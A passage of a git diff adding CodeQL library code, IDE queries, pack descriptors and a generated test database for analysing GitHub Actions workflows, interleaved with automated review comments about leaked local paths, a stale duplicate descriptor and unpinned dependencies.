its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml new file mode 100644 index 000000000000..df2fe6e37348 --- /dev/null +++ b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml 
@@ -0,0 +1,39 @@
+---
+sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib
+baselineLinesOfCode: 0
+unicodeNewlines: false
+columnKind: utf16
+primaryLanguage: yaml
+inProgress:
+ primaryLanguage: yaml
+ installedExtractors:
+ go:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go
+ python:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python
+ java:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java
+ html:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html
+ xml:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml
+ properties:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties
+ cpp:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp
+ swift:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift
+ csv:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv
+ yaml:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml
+ csharp:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp
+ javascript:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript
+ ruby:
+ - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby
+creationMetadata:
+ cliVersion: 2.16.0
+ creationTime: 2024-02-02T10:02:02.082819Z
+finalised: false
diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/ql/lib/ide-contextual-queries/printAst.ql
new file mode 100644
index 000000000000..9effce3721f5
--- /dev/null
+++ b/ql/lib/ide-contextual-queries/printAst.ql
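Review bot: This commits a generated CodeQL database descriptor whose `sourceLocationPrefix` and every `installedExtractors` entry are absolute paths from one developer's workstation (`/Users/pwntester/...`, a Neovim mason install of the CLI), and it is still marked `finalised: false`; it leaks local machine layout into the repository history, can never match another checkout, and nothing in the pack consumes it. Drop the `ide-contextual-queries.testproj/` directory from the commit and add an ignore rule such as `*.testproj/` so the CLI regenerates it locally on demand; the same treatment is worth considering for any other database directory added by this commit.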
@@ -0,0 +1,29 @@
+/**
+ * @name Print AST
+ * @description Produces a representation of a file's Abstract Syntax Tree.
+ * This query is used by the VS Code extension.
+ * @id actions/print-ast
+ * @kind graph
+ * @tags ide-contextual-queries/print-ast
+ */
+
+private import codeql.actions.ideContextual.IDEContextual
+import codeql.actions.ideContextual.printAst
+private import codeql.actions.Ast
+
+/**
+ * The source file to generate an AST from.
+ */
+external string selectedSourceFile();
+
+/**
+ * A configuration that only prints nodes in the selected source file.
+ */
+class Cfg extends PrintAstConfiguration {
+ override predicate shouldPrintNode(PrintAstNode n) {
+ super.shouldPrintNode(n) and
+ n instanceof PrintRegularAstNode and
+ n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile())
+ }
+}
+
diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/ql/lib/ide-contextual-queries/printCfg.ql
new file mode 100644
index 000000000000..d4a90f87f923
--- /dev/null
+++ b/ql/lib/ide-contextual-queries/printCfg.ql
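Review bot: The configuration class is named `Cfg`, which elsewhere in this pack is the alias for the control-flow-graph module (`private import codeql.actions.Cfg as Cfg`), so `class Cfg extends PrintAstConfiguration` reads as if it were about control flow rather than a print filter. Rename it to something descriptive, e.g. `class PrintAstCfg extends PrintAstConfiguration {`, keeping the doc comment above it. Nothing else references the name in this hunk, so the rename is local.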
@@ -0,0 +1,53 @@
+/**
+ * @name Print CFG
+ * @description Produces a representation of a file's Control Flow Graph.
+ * This query is used by the VS Code extension.
+ * @id actions/print-cfg
+ * @kind graph
+ * @tags ide-contextual-queries/print-cfg
+ */
+
+ private import codeql.actions.Cfg
+ private import codeql.actions.Cfg::TestOutput
+ private import codeql.actions.ideContextual.IDEContextual
+ private import codeql.Locations
+
+ /**
+ * Gets the source file to generate a CFG from.
+ */
+ external string selectedSourceFile();
+
+ external string selectedSourceLine();
+
+ external string selectedSourceColumn();
+
+ bindingset[file, line, column]
+ private CfgScope smallestEnclosingScope(File file, int line, int column) {
+ result =
+ min(Location loc, CfgScope scope |
+ loc = scope.getLocation() and
+ (
+ loc.getStartLine() < line
+ or
+ loc.getStartLine() = line and loc.getStartColumn() <= column
+ ) and
+ (
+ loc.getEndLine() > line
+ or
+ loc.getEndLine() = line and loc.getEndColumn() >= column
+ ) and
+ loc.getFile() = file
+ |
+ scope
+ order by
+ loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn()
+ )
+ }
+
+ class MyRelevantNode extends RelevantNode {
+ MyRelevantNode() {
+ this.getScope() =
+ smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()),
+ selectedSourceLine().toInt(), selectedSourceColumn().toInt())
+ }
+ }
diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo
new file mode 100644
index 000000000000..c77f7924c126
--- /dev/null
+++ b/ql/lib/qlpack.gbo
@@ -0,0 +1,13 @@
+---
+warnOnImplicitThis: false
+name: seclab/actions-all
+version: 0.0.1-dev
+groups: actions
+extractor: actions
+library: true
+tests: test
+dependencies:
+ codeql/javascript-all: ^0.8.7
+ "codeql/controlflow": "*"
+ "codeql/dataflow": "*"
+ "codeql/ssa": "*"
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
new file mode 100644
index 000000000000..325c63f4625d
--- /dev/null
+++ b/ql/lib/qlpack.yml
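Review bot: `ql/lib/qlpack.gbo` looks like a stale copy of the pack descriptor rather than anything the CodeQL CLI reads: it declares a different pack name (`seclab/actions-all`), a different `extractor` (`actions`) and a `codeql/javascript-all` dependency that the real `qlpack.yml` in this commit does not have. Two near-duplicate descriptors side by side invite someone to edit the wrong one and make it unclear which dependency set the pack was tested with; delete the file from the commit, and if the `.gbo` suffix is an editor backup artifact, add a `*.gbo` ignore rule so it does not come back.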
@@ -0,0 +1,15 @@
+---
+library: true
+warnOnImplicitThis: true
+name: codeql/actions-all
+version: 0.0.1-dev
+dependencies:
+ codeql/controlflow: ^0.1.7
+ codeql/yaml: '*'
+ codeql/util: '*'
+ codeql/dataflow: ^0.1.7
+dbscheme: yaml.dbscheme
+extractor: yaml
+tests: test
+groups:
+ - yaml
diff --git a/ql/lib/test-db/baseline-info.json b/ql/lib/test-db/baseline-info.json
new file mode 100644
index 000000000000..9e26dfeeb6e6
--- /dev/null
+++ b/ql/lib/test-db/baseline-info.json
@@ -0,0 +1 @@
+{}
\ No newline at end of file
diff --git a/ql/lib/test-db/codeql-database.yml b/ql/lib/test-db/codeql-database.yml
new file mode 100644
index 000000000000..887a8daf4c13
--- /dev/null
+++ b/ql/lib/test-db/codeql-database.yml
@@ -0,0 +1,10 @@
+---
+sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test
+baselineLinesOfCode: 0
+unicodeNewlines: false
+columnKind: utf16
+primaryLanguage: yaml
+creationMetadata:
+ cliVersion: 2.16.1
+ creationTime: 2024-02-03T09:17:54.858204Z
+finalised: true
diff --git a/ql/lib/test-db/db-yaml/default/cache/.lock b/ql/lib/test-db/db-yaml/default/cache/.lock
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info
new file mode 100644
index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2
GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000
new file mode 100644
index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa
GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001
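Review bot: `codeql/yaml: '*'` and `codeql/util: '*'` accept any published version of those packs, whereas `codeql/controlflow` and `codeql/dataflow` on the neighbouring lines are pinned to `^0.1.7`; a wildcard resolves to whatever is newest at `codeql pack install` time, so two checkouts can compile this library against different upstream code, and a breaking or tampered release is adopted automatically. Pin both to a caret range of the versions you actually tested against, in the same style as the other two dependencies, and commit the resulting pack lock file so resolution is reproducible. The `warnOnImplicitThis: true` setting is good and differs from the `.gbo` copy, which is one more reason to keep only this descriptor.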
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo b/ql/lib/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..d14fdc5df9e27d6e8465f5feee0cd63125b6c0c2 GIT binary patch literal 28 TcmZQz00Slng&^}g^^O4m1iu0A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|2mmC@0$~6E literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet new file mode 100644 index 0000000000000000000000000000000000000000..36cf33f33935c54f9618dc388940689272213cda GIT binary patch literal 1080 zcmXxi*GdFI5Jus_9QVe&=A3iRIUpj6h=^CBh>D1q5TDjZ**aM^@zLMv$($bW?8z>8ejR&VzKt+O~gY#eUbW`5k&Xb&2lLO}bC>KlJzO zQazws^pNH~=pWIodQ9_P)W3cn`AM}iV)a(=MpEdi0U-Z0w)$AMfH@&FeHTy{YLoe%3&Aw9q)~otQ zv(MCj^?G`eE%Md)Ir4E1s71a_9r?C&ZIP&f4$j7;%9{Kil*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion new file mode 100644 index 0000000000000000000000000000000000000000..5d863c8ae718a6bd8aef9eef33ef17233531c555 GIT binary patch literal 16 RcmZQz00Tx4DWv-TKL7)*0w(|f literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TCompletion#0# new file mode 100644 index 0000000000000000000000000000000000000000..7dd70cb6a64b2f37bd6f247f4d864537e7f581e0 GIT binary patch literal 12 RcmZQzU|>*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType new file mode 100644 index 0000000000000000000000000000000000000000..4af95d3c402dcba274e92d90fdb3f7e2d597fba3 GIT binary patch literal 16 RcmZQz00R~fndC2B0009|0YLx& literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# b/ql/lib/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#f90a6699--Completion--TSuccessorType#0# new file mode 100644 index 0000000000000000000000000000000000000000..7dd70cb6a64b2f37bd6f247f4d864537e7f581e0 GIT binary patch literal 12 RcmZQzU|>*mxi15x7yt;i0bu|D literal 0 HcmV?d00001 
